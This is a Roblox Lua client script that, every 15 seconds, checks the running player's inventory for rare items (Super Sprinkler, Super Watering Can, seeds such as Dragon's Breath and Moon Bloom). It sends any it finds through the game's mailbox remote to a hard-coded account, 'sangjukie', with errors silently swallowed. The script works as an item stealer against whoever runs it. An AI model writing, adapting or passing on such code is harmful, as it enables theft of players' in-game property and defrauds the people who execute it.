local Players = game:GetService("Players")
local ReplicatedStorage = game:GetService("ReplicatedStorage")

local LocalPlayer = Players.LocalPlayer
local Networking = require(ReplicatedStorage.SharedModules.Networking)

--------------------------------------------------
-- CONFIG
--------------------------------------------------

local USERNAME = "sangjukie"
local INTERVAL = 15

--------------------------------------------------
-- GET USER ID
--------------------------------------------------

local Success, UserId = pcall(function()
	return Players:GetUserIdFromNameAsync(USERNAME)
end)

if not Success then
	return
end

--------------------------------------------------
-- CHECK ITEM
--------------------------------------------------

local function HasItem(ItemName)
	local Backpack = LocalPlayer:FindFirstChild("Backpack")
	local Character = LocalPlayer.Character

	return (Backpack and Backpack:FindFirstChild(ItemName))
		or (Character and Character:FindFirstChild(ItemName))
end

--------------------------------------------------
-- LOOP GIFT
--------------------------------------------------

while task.wait(INTERVAL) do

	if HasItem("aaaSuper Sprinkler") then
		pcall(function()
			Networking.Mailbox.SendBatch:Fire(
				UserId,
				{
					{
						Category = "Sprinklers",
						ItemKey = "Super Sprinkler",
						Count = 2
					}
				},
				"Supersprinkler"
			)
		end)
	end

	if HasItem("Super Watering Can") then
		pcall(function()
			Networking.Mailbox.SendBatch:Fire(
				UserId,
				{
					{
						Category = "WateringCans",
						ItemKey = "Super Watering Can",
						Count = 2
					}
				},
				"SuperWateringCan"
			)
		end)
	end


	if HasItem("Venom Spitter") then
		pcall(function()
			Networking.Mailbox.SendBatch:Fire(
				UserId,
				{
					{
						Category = "Seeds",
						ItemKey = "Venom Spitter",
						Count = 1
					}
				},
				"VenomSpitter"
			)
		end)
	end


	if HasItem("Mega") then
		pcall(function()
			Networking.Mailbox.SendBatch:Fire(
				UserId,
				{
					{
						Category = "Seeds",
						ItemKey = "Mega",
						Count = 10
					}
				},
				"Mega"
			)
		end)
	end

	if HasItem("Dragon's Breath") then
		pcall(function()
			Networking.Mailbox.SendBatch:Fire(
				UserId,
				{
					{
						Category = "Seeds",
						ItemKey = "Dragon's Breath",
						Count = 1
					}
				},
				"Dragon's Breath"
			)
		end)
	end

	

	if HasItem("Venus Fly Trap") then
		pcall(function()
			Networking.Mailbox.SendBatch:Fire(
				UserId,
				{
					{
						Category = "Seeds",
						ItemKey = "Venus Fly Trap",
						Count = 1
					}
				},
				"Venus Fly Trap"
			)
		end)
	end

	

	if HasItem("Moon Bloom") then
		pcall(function()
			Networking.Mailbox.SendBatch:Fire(
				UserId,
				{
					{
						Category = "Seeds",
						ItemKey = "Moon Bloom",
						Count = 1
					}
				},
				"Moon Bloom"
			)
		end)
	end

	if HasItem("Hypno Bloom") then
		pcall(function()
			Networking.Mailbox.SendBatch:Fire(
				UserId,
				{
					{
						Category = "Seeds",
						ItemKey = "Hypno Bloom",
						Count = 1
					}
				},
				"Hypno Bloom"
			)
		end)
	end

	



end
